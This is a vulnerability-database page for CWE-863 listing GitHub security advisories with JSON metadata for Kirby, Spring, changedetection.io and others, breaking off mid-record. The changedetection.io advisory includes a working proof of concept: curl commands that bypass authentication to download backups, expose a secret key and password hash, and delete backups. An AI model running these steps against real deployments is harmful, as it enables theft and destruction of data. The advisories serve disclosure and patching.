CWE-863
Allowed-with-ReviewIncorrect Authorization
Abstraction: Class · Status: Incomplete
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
5518 vulnerabilities reference this CWE, most recent first.
GHSA-JM9M-RQR3-WFMH
Vulnerability from github – Published: 2024-08-29 17:55 – Updated: 2024-08-29 19:07TL;DR
This vulnerability affects all Kirby sites with enabled languages option that might have potential attackers in the group of authenticated Panel users.
If you have disabled the languages and/or api option and don't call any methods in your code that cause a write access to languages (language creation, update or deletion), your site is not affected.
Introduction
Kirby allows to restrict the permissions of specific user roles. Users of that role can only perform permitted actions.
Permissions for creating and deleting languages have already existed and could be configured, but were not enforced by Kirby's frontend or backend code.
A permission for updating existing languages has not existed before the patched versions. So disabling the languages.* wildcard permission for a role could not have prohibited updates to existing language definitions.
Impact
The missing permission checks allowed attackers with Panel access to manipulate the language definitions.
The language definitions are at the core of multi-language content in Kirby. Unauthorized modifications with malicious intent can cause significant damage, for example:
- If the
languagesoption was enabled but no language exists, creating the first language will switch Kirby to multi-language mode. - Deleting an existing language will lead to content loss of all translated content in that language. Deleting the last language will switch Kirby to single-language mode.
- Updating a language allows to change the metadata including the language slug (used in page URLs) and language variables. It also allows to change the default language, which will cause Kirby to use the new default language's content as a fallback for non-existing translations.
Depending on the site code, the result of such actions can cause loss of site availability (e.g. error messages in the site frontend) or integrity (due to changed URLs or removed translations).
Patches
The problem has been patched in Kirby 3.6.6.6, Kirby 3.7.5.5, Kirby 3.8.4.4, Kirby 3.9.8.2, Kirby 3.10.1.1, and Kirby 4.3.1. Please update to one of these or a later version to fix the vulnerability.
In all of the mentioned releases, we have added checks for the languages.create and languages.delete permissions that ensure that users without those permissions cannot perform the respective actions. We have also added a new languages.update permission.
Credits
Thanks to Sebastian Eberlein of JUNO (@SebastianEberlein-JUNO) for reporting the identified issue.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.6.6.5"
},
"package": {
"ecosystem": "Packagist",
"name": "getkirby/cms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.6.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.7.5.4"
},
"package": {
"ecosystem": "Packagist",
"name": "getkirby/cms"
},
"ranges": [
{
"events": [
{
"introduced": "3.7.0"
},
{
"fixed": "3.7.5.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.8.4.3"
},
"package": {
"ecosystem": "Packagist",
"name": "getkirby/cms"
},
"ranges": [
{
"events": [
{
"introduced": "3.8.0"
},
{
"fixed": "3.8.4.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.9.8.1"
},
"package": {
"ecosystem": "Packagist",
"name": "getkirby/cms"
},
"ranges": [
{
"events": [
{
"introduced": "3.9.0"
},
{
"fixed": "3.9.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.10.1"
},
"package": {
"ecosystem": "Packagist",
"name": "getkirby/cms"
},
"ranges": [
{
"events": [
{
"introduced": "3.10.0"
},
{
"fixed": "3.10.1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.3.0"
},
"package": {
"ecosystem": "Packagist",
"name": "getkirby/cms"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-41964"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-29T17:55:30Z",
"nvd_published_at": "2024-08-29T17:15:07Z",
"severity": "HIGH"
},
"details": "### TL;DR\n\nThis vulnerability affects all Kirby sites with enabled `languages` option that might have potential attackers in the group of authenticated Panel users.\n\nIf you have disabled the `languages` and/or `api` option and don\u0027t call any methods in your code that cause a write access to languages (language creation, update or deletion), your site is *not* affected.\n\n----\n\n### Introduction\n\nKirby allows to restrict the permissions of specific user roles. Users of that role can only perform permitted actions.\n\nPermissions for creating and deleting languages have already existed and could be configured, but were not enforced by Kirby\u0027s frontend or backend code.\n\nA permission for updating existing languages has not existed before the patched versions. So disabling the `languages.*` wildcard permission for a role could not have prohibited updates to existing language definitions.\n\n### Impact\n\nThe missing permission checks allowed attackers with Panel access to manipulate the language definitions.\n\nThe language definitions are at the core of multi-language content in Kirby. Unauthorized modifications with malicious intent can cause significant damage, for example:\n\n- If the `languages` option was enabled but no language exists, creating the first language will switch Kirby to multi-language mode.\n- Deleting an existing language will lead to content loss of all translated content in that language. Deleting the last language will switch Kirby to single-language mode.\n- Updating a language allows to change the metadata including the language slug (used in page URLs) and language variables. It also allows to change the default language, which will cause Kirby to use the new default language\u0027s content as a fallback for non-existing translations.\n\nDepending on the site code, the result of such actions can cause loss of site availability (e.g. error messages in the site frontend) or integrity (due to changed URLs or removed translations).\n\n### Patches\n\nThe problem has been patched in [Kirby 3.6.6.6](https://github.com/getkirby/kirby/releases/tag/3.6.6.6), [Kirby 3.7.5.5](https://github.com/getkirby/kirby/releases/tag/3.7.5.5), [Kirby 3.8.4.4](https://github.com/getkirby/kirby/releases/tag/3.8.4.4), [Kirby 3.9.8.2](https://github.com/getkirby/kirby/releases/tag/3.9.8.2), [Kirby 3.10.1.1](https://github.com/getkirby/kirby/releases/tag/3.10.1.1), and [Kirby 4.3.1](https://github.com/getkirby/kirby/releases/tag/4.3.1). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability.\n\nIn all of the mentioned releases, we have added checks for the `languages.create` and `languages.delete` permissions that ensure that users without those permissions cannot perform the respective actions. We have also added a new `languages.update` permission.\n\n### Credits\n\nThanks to Sebastian Eberlein of JUNO (@SebastianEberlein-JUNO) for reporting the identified issue.",
"id": "GHSA-jm9m-rqr3-wfmh",
"modified": "2024-08-29T19:07:02Z",
"published": "2024-08-29T17:55:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/security/advisories/GHSA-jm9m-rqr3-wfmh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41964"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/commit/1dbc9215c97a5c22dc7f34a4e3a64d19e1eac151"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/commit/38636655b054e820f66c3b717c55a9d60fe6400a"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/commit/83fce501759782cf843b6f1d9293a7c7167e69af"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/commit/ab95d172667c3cd529917c2bc94d3c7969706d23"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/commit/af9b0a58dea63effab85525ae217faa1f5ded423"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/commit/e647a177c75636ef4824662b2ce00d8e5c3a8406"
},
{
"type": "PACKAGE",
"url": "https://github.com/getkirby/kirby"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/releases/tag/3.10.1.1"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/releases/tag/3.6.6.6"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/releases/tag/3.7.5.5"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/releases/tag/3.8.4.4"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/releases/tag/3.9.8.2"
},
{
"type": "WEB",
"url": "https://github.com/getkirby/kirby/releases/tag/4.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Kirby has insufficient permission checks in the language settings"
}
GHSA-JMF8-XH4V-2PR9
Vulnerability from github – Published: 2023-09-04 12:30 – Updated: 2024-04-04 07:25The Media from FTP WordPress plugin before 11.17 does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.
{
"affected": [],
"aliases": [
"CVE-2023-4019"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-04T12:15:10Z",
"severity": "HIGH"
},
"details": "The Media from FTP WordPress plugin before 11.17 does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.",
"id": "GHSA-jmf8-xh4v-2pr9",
"modified": "2024-04-04T07:25:58Z",
"published": "2023-09-04T12:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4019"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JMFH-38X7-P523
Vulnerability from github – Published: 2024-12-20 15:30 – Updated: 2024-12-20 15:30In JetBrains TeamCity before 2024.12 improper access control allowed viewing details of unauthorized agents
{
"affected": [],
"aliases": [
"CVE-2024-56348"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-20T15:15:05Z",
"severity": "MODERATE"
},
"details": "In JetBrains TeamCity before 2024.12 improper access control allowed viewing details of unauthorized agents",
"id": "GHSA-jmfh-38x7-p523",
"modified": "2024-12-20T15:30:48Z",
"published": "2024-12-20T15:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56348"
},
{
"type": "WEB",
"url": "https://www.jetbrains.com/privacy-security/issues-fixed"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-JMG4-X4VP-6C6X
Vulnerability from github – Published: 2022-05-13 01:18 – Updated: 2024-04-12 21:13When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.geode:geode-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-15695"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-08T14:16:18Z",
"nvd_published_at": "2018-06-13T17:29:00Z",
"severity": "HIGH"
},
"details": "When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.",
"id": "GHSA-jmg4-x4vp-6c6x",
"modified": "2024-04-12T21:13:17Z",
"published": "2022-05-13T01:18:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15695"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/pull/1258"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/00be4f9774e1adf8e7ccc2664da8005fc30bb11d"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/49d28f93fd2ef069693ce15d124ef3a29f22fb7d"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/6df14c8b1e3c644f9f810149e80bba0c2f073dab"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/740289c61d60256c6270756bc84b9e24b76e4913"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/90f8f6242927c5e16da64f38bba9abf3d450a305"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/954ccb545d24a9c9a35cbd84023a4d7e07032de0"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/aa469239860778eb46e09dd7b390aee08f152480"
},
{
"type": "WEB",
"url": "https://cwiki.apache.org/confluence/display/GEODE/Release+Notes#ReleaseNotes-SecurityVulnerabilities"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/geode"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/GEODE-3974"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/dc8875c0b924885a884eba6d5bd7dc3f123411b2d33cffd00e351c99@%3Cuser.geode.apache.org%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache Geode vulnerable to Incorrect Authorization"
}
GHSA-JMP9-X22R-554X
Vulnerability from github – Published: 2025-09-16 15:32 – Updated: 2025-09-16 21:34The Spring Framework annotation detection mechanism may not correctly resolve annotations on methods within type hierarchies with a parameterized super type with unbounded generics. This can be an issue if such annotations are used for authorization decisions.
Your application may be affected by this if you are using Spring Security's @EnableMethodSecurity feature.
You are not affected by this if you are not using @EnableMethodSecurity or if you do not use security annotations on methods in generic superclasses or generic interfaces.
This CVE is published in conjunction with CVE-2025-41248 https://spring.io/security/cve-2025-41248 .
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework:spring-core"
},
"ranges": [
{
"events": [
{
"introduced": "5.3.0"
},
{
"last_affected": "5.3.44"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework:spring-core"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"last_affected": "6.1.22"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.2.10"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework:spring-core"
},
"ranges": [
{
"events": [
{
"introduced": "6.2.0"
},
{
"fixed": "6.2.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-41249"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-16T19:38:20Z",
"nvd_published_at": "2025-09-16T11:15:30Z",
"severity": "HIGH"
},
"details": "The Spring Framework annotation detection mechanism may not correctly resolve annotations on methods within type hierarchies with a parameterized super type with unbounded generics. This can be an issue if such annotations are used for authorization decisions.\n\nYour application may be affected by this if you are using Spring Security\u0027s @EnableMethodSecurity\u00a0feature.\n\nYou are not affected by this if you are not using @EnableMethodSecurity\u00a0or if you do not use security annotations on methods in generic superclasses or generic interfaces.\n\nThis CVE is published in conjunction with CVE-2025-41248 https://spring.io/security/cve-2025-41248 .",
"id": "GHSA-jmp9-x22r-554x",
"modified": "2025-09-16T21:34:22Z",
"published": "2025-09-16T15:32:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41249"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-framework/issues/35342"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-framework/commit/6d710d482a6785b069e35022e81758953afc21ff"
},
{
"type": "PACKAGE",
"url": "https://github.com/spring-projects/spring-framework"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-framework/releases/tag/v6.2.11"
},
{
"type": "WEB",
"url": "https://spring.io/security/cve-2025-41249"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Spring Framework annotation detection mechanism may result in improper authorization"
}
GHSA-JMRH-XMGH-X9J4
Vulnerability from github – Published: 2026-04-06 18:00 – Updated: 2026-06-05 14:27Summary
On 13 routes across 5 blueprint files, the @login_optionally_required decorator is placed before (outer to) @blueprint.route() instead of after it. In Flask, @route() must be the outermost decorator because it registers the function it receives. When the order is reversed, @route() registers the original undecorated function, and the auth wrapper is never in the call chain. This silently disables authentication on these routes.
The developer correctly uses the decorator on 30+ other routes with the proper order, making this a classic consistency gap.
Details
Correct order (used on 30+ routes):
@blueprint.route('/settings', methods=['GET'])
@login_optionally_required
def settings():
...
Incorrect order (13 vulnerable routes):
@login_optionally_required # ← Applied to return value of @route, NOT the view
@blueprint.route('/backups/download/<filename>') # ← Registers raw function
def download_backup(filename):
...
POC
=== PHASE 1: Confirm Authentication is Required ===
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/
Main page: HTTP 302 -> http://127.0.0.1:5557/login?next=/
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/settings
Settings page: HTTP 302 (auth required, redirects to login)
Password is set. Unauthenticated requests to / and /settings
are properly redirected to /login.
=== PHASE 2: Authentication Bypass on Backup Routes ===
(All requests made WITHOUT any session cookie)
--- Exploit 1: Trigger backup creation ---
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/backups/request-backup
Response: HTTP 302 -> http://127.0.0.1:5557/backups/
(302 redirects to /backups/ listing page, NOT to /login -- backup was created)
--- Exploit 2: List backups page ---
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/backups/
Response: HTTP 200
--- Exploit 3: Extract backup filenames ---
$ curl -s http://127.0.0.1:5557/backups/ | grep changedetection-backup
Found: changedetection-backup-20260331005425.zip
--- Exploit 4: Download backup without authentication ---
$ curl -s -o /tmp/stolen_backup.zip http://127.0.0.1:5557/backups/download/changedetection-backup-20260331005425.zip
Response: HTTP 200
$ file /tmp/stolen_backup.zip
/tmp/stolen_backup.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
$ ls -la /tmp/stolen_backup.zip
-rw-r--r-- 1 root root 92559 Mar 31 00:54 /tmp/stolen_backup.zip
$ unzip -l /tmp/stolen_backup.zip
Archive: /tmp/stolen_backup.zip
Length Date Time Name
--------- ---------- ----- ----
26496 2026-03-31 00:54 url-watches.json
64 2026-03-31 00:52 secret.txt
51 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/history.txt
1682 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/4b7f61d9f981b92103a6659f0d79a93e.txt.br
4395 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/1774911131.html.br
40877 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/6b3a3023b357a0ea25fc373c7e358ce2.txt.br
51 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/history.txt
40877 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/1774911131.html.br
73 2026-03-31 00:54 url-list.txt
155 2026-03-31 00:54 url-list-with-tags.txt
--------- -------
114721 10 files
--- Exploit 5: Extract sensitive data from backup ---
Application password hash: pG+Bq6s4/EhsRqYZYc7kiGEG1QMd2hMuadD5qCMbSBcRIMnGTATliX/P0vFX...
Watched URLs:
- https://news.ycombinator.com/ (UUID: 4ff247a9...)
- https://changedetection.io/CHANGELOG.txt (UUID: c8d85001...)
Flask secret key: 7cb14f56dc4f26761a22e7d35cc7b6911bfaa5e0790d2b58dadba9e529e5a4d6
--- Exploit 6: Delete all backups without auth ---
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/backups/remove-backups
Response: HTTP 302
=== PHASE 3: Cross-Verification ===
Verify protected routes still require auth:
/ -> HTTP 302 (302 = protected)
/settings -> HTTP 302 (302 = protected)
=== RESULTS ===
PROTECTED routes (auth required, HTTP 302 -> /login):
/ HTTP 302
/settings HTTP 302
BYPASSED routes (no auth needed):
/backups/request-backup HTTP 302 (triggers backup creation, redirects to /backups/ not /login)
/backups/ HTTP 200 (lists all backups)
/backups/download/<file> HTTP 200 (downloads backup with secrets)
/backups/remove-backups HTTP 302 (deletes all backups)
[+] CONFIRMED: Authentication bypass on backup routes!
Impact
- Complete data exfiltration — Backups contain all monitored URLs, notification webhook URLs (which may contain API tokens for Slack, Discord, etc.), and configuration
- Backup restore = config injection — Attacker can upload a malicious backup with crafted watch configs
- SSRF — Proxy check endpoint can be triggered to scan internal network
- Browser session hijacking — Browser steps endpoints allow controlling Playwright sessions
Remediation
Swap the decorator order on all 13 routes. @blueprint.route() must be outermost:
# Before (VULNERABLE):
@login_optionally_required
@blueprint.route('/backups/download/<filename>')
def download_backup(filename):
# After (FIXED):
@blueprint.route('/backups/download/<filename>')
@login_optionally_required
def download_backup(filename):
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.54.7"
},
"package": {
"ecosystem": "PyPI",
"name": "changedetection.io"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.54.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35490"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-06T18:00:01Z",
"nvd_published_at": "2026-04-07T16:16:27Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nOn 13 routes across 5 blueprint files, the `@login_optionally_required` decorator is placed **before** (outer to) `@blueprint.route()` instead of after it. In Flask, `@route()` must be the outermost decorator because it registers the function it receives. When the order is reversed, `@route()` registers the **original undecorated function**, and the auth wrapper is never in the call chain. This silently disables authentication on these routes.\n\nThe developer correctly uses the decorator on 30+ other routes with the proper order, making this a classic consistency gap.\n\n### Details\n\n**Correct order (used on 30+ routes):**\n```python\n@blueprint.route(\u0027/settings\u0027, methods=[\u0027GET\u0027])\n@login_optionally_required\ndef settings():\n ...\n```\n\n**Incorrect order (13 vulnerable routes):**\n```python\n@login_optionally_required # \u2190 Applied to return value of @route, NOT the view\n@blueprint.route(\u0027/backups/download/\u003cfilename\u003e\u0027) # \u2190 Registers raw function\ndef download_backup(filename):\n ...\n```\n\n## POC\n```\n=== PHASE 1: Confirm Authentication is Required ===\n\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/\nMain page: HTTP 302 -\u003e http://127.0.0.1:5557/login?next=/\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/settings\nSettings page: HTTP 302 (auth required, redirects to login)\n\nPassword is set. Unauthenticated requests to / and /settings\nare properly redirected to /login.\n\n=== PHASE 2: Authentication Bypass on Backup Routes ===\n(All requests made WITHOUT any session cookie)\n\n--- Exploit 1: Trigger backup creation ---\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/backups/request-backup\nResponse: HTTP 302 -\u003e http://127.0.0.1:5557/backups/\n(302 redirects to /backups/ listing page, NOT to /login -- backup was created)\n\n--- Exploit 2: List backups page ---\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/backups/\nResponse: HTTP 200\n\n--- Exploit 3: Extract backup filenames ---\n$ curl -s http://127.0.0.1:5557/backups/ | grep changedetection-backup\nFound: changedetection-backup-20260331005425.zip\n\n--- Exploit 4: Download backup without authentication ---\n$ curl -s -o /tmp/stolen_backup.zip http://127.0.0.1:5557/backups/download/changedetection-backup-20260331005425.zip\nResponse: HTTP 200\n\n$ file /tmp/stolen_backup.zip\n/tmp/stolen_backup.zip: Zip archive data, at least v2.0 to extract, compression method=deflate\n\n$ ls -la /tmp/stolen_backup.zip\n-rw-r--r-- 1 root root 92559 Mar 31 00:54 /tmp/stolen_backup.zip\n\n$ unzip -l /tmp/stolen_backup.zip\nArchive: /tmp/stolen_backup.zip\n Length Date Time Name\n--------- ---------- ----- ----\n 26496 2026-03-31 00:54 url-watches.json\n 64 2026-03-31 00:52 secret.txt\n 51 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/history.txt\n 1682 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/4b7f61d9f981b92103a6659f0d79a93e.txt.br\n 4395 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/1774911131.html.br\n 40877 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/6b3a3023b357a0ea25fc373c7e358ce2.txt.br\n 51 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/history.txt\n 40877 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/1774911131.html.br\n 73 2026-03-31 00:54 url-list.txt\n 155 2026-03-31 00:54 url-list-with-tags.txt\n--------- -------\n 114721 10 files\n\n--- Exploit 5: Extract sensitive data from backup ---\nApplication password hash: pG+Bq6s4/EhsRqYZYc7kiGEG1QMd2hMuadD5qCMbSBcRIMnGTATliX/P0vFX...\nWatched URLs:\n - https://news.ycombinator.com/ (UUID: 4ff247a9...)\n - https://changedetection.io/CHANGELOG.txt (UUID: c8d85001...)\n\nFlask secret key: 7cb14f56dc4f26761a22e7d35cc7b6911bfaa5e0790d2b58dadba9e529e5a4d6\n\n--- Exploit 6: Delete all backups without auth ---\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/backups/remove-backups\nResponse: HTTP 302\n\n=== PHASE 3: Cross-Verification ===\n\nVerify protected routes still require auth:\n / -\u003e HTTP 302 (302 = protected)\n /settings -\u003e HTTP 302 (302 = protected)\n\n=== RESULTS ===\n\nPROTECTED routes (auth required, HTTP 302 -\u003e /login):\n / HTTP 302\n /settings HTTP 302\n\nBYPASSED routes (no auth needed):\n /backups/request-backup HTTP 302 (triggers backup creation, redirects to /backups/ not /login)\n /backups/ HTTP 200 (lists all backups)\n /backups/download/\u003cfile\u003e HTTP 200 (downloads backup with secrets)\n /backups/remove-backups HTTP 302 (deletes all backups)\n\n[+] CONFIRMED: Authentication bypass on backup routes!\n```\n\n### Impact\n\n- **Complete data exfiltration** \u2014 Backups contain all monitored URLs, notification webhook URLs (which may contain API tokens for Slack, Discord, etc.), and configuration\n- **Backup restore = config injection** \u2014 Attacker can upload a malicious backup with crafted watch configs\n- **SSRF** \u2014 Proxy check endpoint can be triggered to scan internal network\n- **Browser session hijacking** \u2014 Browser steps endpoints allow controlling Playwright sessions\n\n### Remediation\n\nSwap the decorator order on all 13 routes. `@blueprint.route()` must be outermost:\n\n```python\n# Before (VULNERABLE):\n@login_optionally_required\n@blueprint.route(\u0027/backups/download/\u003cfilename\u003e\u0027)\ndef download_backup(filename):\n\n# After (FIXED):\n@blueprint.route(\u0027/backups/download/\u003cfilename\u003e\u0027)\n@login_optionally_required\ndef download_backup(filename):\n```",
"id": "GHSA-jmrh-xmgh-x9j4",
"modified": "2026-06-05T14:27:00Z",
"published": "2026-04-06T18:00:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-jmrh-xmgh-x9j4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35490"
},
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/commit/31a760c2147e3e73a403baf6d7de34dc50429c85"
},
{
"type": "PACKAGE",
"url": "https://github.com/dgtlmoon/changedetection.io"
},
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.8"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/changedetection-io/PYSEC-2026-28.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "changedetection.io Vulnerable to Authentication Bypass via Decorator Ordering"
}
GHSA-JMV4-P83R-GRW3
Vulnerability from github – Published: 2026-07-07 15:32 – Updated: 2026-07-07 15:32This vulnerability allows an unauthenticated actor to bypass authentication and gain access to restricted resources on the device.
{
"affected": [],
"aliases": [
"CVE-2026-12352"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-07T15:16:42Z",
"severity": "MODERATE"
},
"details": "This vulnerability allows an unauthenticated actor to bypass authentication and gain access to restricted resources on the device.",
"id": "GHSA-jmv4-p83r-grw3",
"modified": "2026-07-07T15:32:57Z",
"published": "2026-07-07T15:32:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12352"
},
{
"type": "WEB",
"url": "https://www.digi.com/resources/security"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-JMW9-579M-CW2X
Vulnerability from github – Published: 2022-05-24 17:21 – Updated: 2022-05-24 17:21OAuth flow missing verification checks CE/EE 12.3 and later through 13.0.1 allows unverified user to use OAuth authorization code flow
{
"affected": [],
"aliases": [
"CVE-2020-13272"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-06-19T22:15:00Z",
"severity": "MODERATE"
},
"details": "OAuth flow missing verification checks CE/EE 12.3 and later through 13.0.1 allows unverified user to use OAuth authorization code flow",
"id": "GHSA-jmw9-579m-cw2x",
"modified": "2022-05-24T17:21:19Z",
"published": "2022-05-24T17:21:19Z",
"references": [
{
"type": "ADVISORY",
